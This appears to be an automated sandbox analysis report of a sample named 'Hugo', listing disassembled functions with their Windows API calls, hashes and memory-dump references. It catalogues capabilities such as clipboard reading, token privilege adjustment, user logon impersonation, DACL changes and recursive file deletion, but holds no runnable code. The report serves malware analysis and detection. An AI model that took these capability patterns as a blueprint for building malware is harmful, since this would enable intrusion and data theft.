                                                                                                                                                                                                              • Instruction ID: e0fac89f3eac0a71df2da90b4e2e2c5f7637df8075ed902b6f7a81fb6dd7b6dc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAF0D47650020DFBDF05DF90C941E9E7B79FF18318F208445F9159A151C336EA61EBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00F13963
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: IconNotifyShell_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1144537725-0
                                                                                                                                                                                                              • Opcode ID: 272a5efc584e926ece98358935def2a2bb6375dcdf7d327af0bbe9ede5fdb6ff
                                                                                                                                                                                                              • Instruction ID: 1a2aba288f80899eba04ffb7b632195de38e442c522e2ca23e825034d2f224a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 272a5efc584e926ece98358935def2a2bb6375dcdf7d327af0bbe9ede5fdb6ff
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7F0377091435C9FE792DF24DC467D57BBCA705708F0000A5A6849A181E7745788DF51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F13A76
                                                                                                                                                                                                                • Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LongNamePath_wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 541455249-0
                                                                                                                                                                                                              • Opcode ID: 70a49d452f5af73e46a7585d0ac07b48807f1823e5c621d78f3cdb4c243dd44b
                                                                                                                                                                                                              • Instruction ID: 381fd3172be517b1e8ea20d59864c26ca9a39d6003647dd694e3c91c73dbc68a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70a49d452f5af73e46a7585d0ac07b48807f1823e5c621d78f3cdb4c243dd44b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAE0C276A002285BCB20A2589C06FEA77EDDFC97A0F4441B1FD09D7258DD64EDC1E6A0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,00000000,?,00F50A84,?,?,00000000,?,00F50A84,00000000,0000000C), ref: 00F50737
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                              • Opcode ID: 7b589d7d080a85b71eecbe5c713829886ddf647926bfe1dc5e4bf41d54b135ec
                                                                                                                                                                                                              • Instruction ID: 03278655908ee100025c1e27250877b08d7f2797ea94b0908742e81418442231
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b589d7d080a85b71eecbe5c713829886ddf647926bfe1dc5e4bf41d54b135ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5D06C3210010DBBDF028F84DD06EDA3BAAFB48714F014000BE5856020C736E821AB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,00F7D840), ref: 00F7EAB1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              • Opcode ID: e15b5e079b8814c74b62acf7544999653e0d843e9c238b6896f1633175328d60
                                                                                                                                                                                                              • Instruction ID: 14cbc6e162f6c5bfd0de6f04d1518d999f9d56348d4b30c36a2d982d66445d5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e15b5e079b8814c74b62acf7544999653e0d843e9c238b6896f1633175328d60
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45B09264C4060005BD280A385A09A99334078473B57DC5BC2E47E854F1C33D8C0FF952
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F7DC54: FindFirstFileW.KERNEL32(?,?), ref: 00F7DCCB
                                                                                                                                                                                                                • Part of subcall function 00F7DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00F7DD1B
                                                                                                                                                                                                                • Part of subcall function 00F7DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00F7DD2C
                                                                                                                                                                                                                • Part of subcall function 00F7DC54: FindClose.KERNEL32(00000000), ref: 00F7DD43
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00F8666E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2191629493-0
                                                                                                                                                                                                              • Opcode ID: 7527e27f35d0bf606545c0d31efe596684121fde5d2798ecd116cec1c2bd91b8
                                                                                                                                                                                                              • Instruction ID: 0c5eab70ec228ab308ba931c93aedbb119bc7cd9dca2c69e7e9c9c75748818c8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7527e27f35d0bf606545c0d31efe596684121fde5d2798ecd116cec1c2bd91b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCF0A7357002044FCB10FF58D845BAEB7E5AF84360F048409F90A8B352CB74BC41DB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F72010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F7205A
                                                                                                                                                                                                                • Part of subcall function 00F72010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F72087
                                                                                                                                                                                                                • Part of subcall function 00F72010: GetLastError.KERNEL32 ref: 00F72097
                                                                                                                                                                                                              • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00F71BD2
                                                                                                                                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00F71BF4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00F71C05
                                                                                                                                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F71C1D
                                                                                                                                                                                                              • GetProcessWindowStation.USER32 ref: 00F71C36
                                                                                                                                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 00F71C40
                                                                                                                                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F71C5C
                                                                                                                                                                                                                • Part of subcall function 00F71A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F71B48), ref: 00F71A20
                                                                                                                                                                                                                • Part of subcall function 00F71A0B: CloseHandle.KERNEL32(?,?,00F71B48), ref: 00F71A35
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                              • String ID: $default$winsta0
                                                                                                                                                                                                              • API String ID: 22674027-1027155976
                                                                                                                                                                                                              • Opcode ID: aa9ca319c6fc6813df00efc4612ba87f62ab9e64c9ab89d929cb1fcf67fab64e
                                                                                                                                                                                                              • Instruction ID: 22f9c6f68a86988c3db352788b1515759eb9449362897d5fd6a2d0d65dcd0bf0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa9ca319c6fc6813df00efc4612ba87f62ab9e64c9ab89d929cb1fcf67fab64e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F8194B1900209AFDF219FA8DC49FEE7BB8FF05310F14801AF919A61A0D7758A49EF51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F71A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F71A60
                                                                                                                                                                                                                • Part of subcall function 00F71A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A6C
                                                                                                                                                                                                                • Part of subcall function 00F71A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A7B
                                                                                                                                                                                                                • Part of subcall function 00F71A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A82
                                                                                                                                                                                                                • Part of subcall function 00F71A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F71A99
                                                                                                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F71518
                                                                                                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F7154C
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00F71563
                                                                                                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00F7159D
                                                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F715B9
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00F715D0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F715D8
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00F715DF
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F71600
                                                                                                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 00F71607
                                                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F71636
                                                                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F71658
                                                                                                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F7166A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F71691
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00F71698
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F716A1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00F716A8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F716B1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00F716B8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00F716C4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00F716CB
                                                                                                                                                                                                                • Part of subcall function 00F71ADF: GetProcessHeap.KERNEL32(00000008,00F714FD,?,00000000,?,00F714FD,?), ref: 00F71AED
                                                                                                                                                                                                                • Part of subcall function 00F71ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F714FD,?), ref: 00F71AF4
                                                                                                                                                                                                                • Part of subcall function 00F71ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F714FD,?), ref: 00F71B03
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4175595110-0
                                                                                                                                                                                                              • Opcode ID: b7c8660fa58fb3e685117363aed4e333f799ac03ff9bbf5429fda2f6448aad17
                                                                                                                                                                                                              • Instruction ID: 12c101eac05149104f50950273da80aca05b4d7182127936ce4e04e31e24d6ca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7c8660fa58fb3e685117363aed4e333f799ac03ff9bbf5429fda2f6448aad17
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E716EB2900209ABDF10DFA9DC44FEEBBB8BF04750F088516E91AA7191D730D909DBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenClipboard.USER32(00FADCD0), ref: 00F8F586
                                                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F8F594
                                                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 00F8F5A0
                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00F8F5AC
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00F8F5E4
                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00F8F5EE
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00F8F619
                                                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00F8F626
                                                                                                                                                                                                              • GetClipboardData.USER32(00000001), ref: 00F8F62E
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00F8F63F
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00F8F67F
                                                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000F), ref: 00F8F695
                                                                                                                                                                                                              • GetClipboardData.USER32(0000000F), ref: 00F8F6A1
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00F8F6B2
                                                                                                                                                                                                              • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00F8F6D4
                                                                                                                                                                                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F8F6F1
                                                                                                                                                                                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F8F72F
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00F8F750
                                                                                                                                                                                                              • CountClipboardFormats.USER32 ref: 00F8F771
                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00F8F7B6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 420908878-0
                                                                                                                                                                                                              • Opcode ID: b350f8ed2febb2b160bfd5c14dd76f1f7b6bf1603f73549b4c392a99e0fc87bb
                                                                                                                                                                                                              • Instruction ID: bd45e9a15b49b271dc2c770edbb3b69e1be7e58890bd9959107d128fc0247044
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b350f8ed2febb2b160bfd5c14dd76f1f7b6bf1603f73549b4c392a99e0fc87bb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE61B0752042059FD300FF20DC85FAAB7E4AF85714F14456DF886CB2A2DB35E949EB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00F87403
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00F87457
                                                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F87493
                                                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F874BA
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F874F7
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F87524
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                              • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                              • API String ID: 3830820486-3289030164
                                                                                                                                                                                                              • Opcode ID: 09af8722855f189db2324005fac199b73ab7f0b47aedb334fe501f3122c8ec6e
                                                                                                                                                                                                              • Instruction ID: f81b9cf4add425228dda493ff82d4c235ec733699c1a5b74905b3ee596c6b549
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09af8722855f189db2324005fac199b73ab7f0b47aedb334fe501f3122c8ec6e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDD15FB2508344AFC310EB64CC95EAFB7ECAF88704F44491DF585D6292EB78DA48D762
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F8A0A8
                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00F8A0E6
                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00F8A100
                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00F8A118
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00F8A123
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00F8A13F
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F8A18F
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00FD7B94), ref: 00F8A1AD
                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F8A1B7
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00F8A1C4
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00F8A1D4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                              • API String ID: 1409584000-438819550
                                                                                                                                                                                                              • Opcode ID: 1d5feb45684c1b2b67f125c7d12f8dc68d9b99bcc77be3fd7d1c1da98cba0714
                                                                                                                                                                                                              • Instruction ID: a20565baf9fe580a209bfdd61eb529e0e032999b1b16a93eff6a93fe42984ceb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d5feb45684c1b2b67f125c7d12f8dc68d9b99bcc77be3fd7d1c1da98cba0714
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2931BF72A0061D6BEB10ABA49C4EADE73ACEF45330F140096E816E2190EB74DE44AF65
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F84785
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F847B2
                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F847E2
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F84803
                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00F84813
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F8489A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00F848A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00F848B0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
